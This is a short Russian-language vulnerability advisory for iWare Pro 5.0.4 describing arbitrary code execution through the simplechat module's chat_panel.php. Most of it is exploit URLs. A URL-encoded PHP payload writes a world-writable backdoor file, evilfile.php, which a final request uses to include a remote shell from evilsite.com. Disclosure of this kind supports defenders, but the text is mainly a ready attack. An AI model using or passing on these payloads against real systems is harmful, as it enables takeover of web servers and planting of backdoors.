Программа: iWare Pro 5.0.4
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных сценарием chat_panel.php. Атакующий может выполнить произвольный сценарий на целевой системе в контексте безопасности запущенного Web сервера.
Примеры:
http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_panel.php?talk=1&msg=[evilcode]
http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_log.php
http://[target]/[path]/admin/mods/simplechat_1.0.0/ chat_panel.php?talk=1&msg=%3C%3Fphp%0D%0A%24open_file+%3D+fopen%28% 22..%2F..%2F..%2Fevilfile.php%22%2C+%22w %22%29%3B%0D%0Afputs%28%24open_file %2C%22%3C%3Fphp+include%28%5C%24_GET%5B%27evil_include%27%5D%29 %3B+%3F%3E%22%29%3B%0D%0Afclose %28%24open_file%29%3B%0D%0Achmod%28%22..%2F..%2F..%2Fevilfile.php% 22%2C0777%29%3B%0D%0A%3F%3E
http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_log.php
http://[target]/[path]/evilfile.php?evil_include=http://evilsite.com/shell.php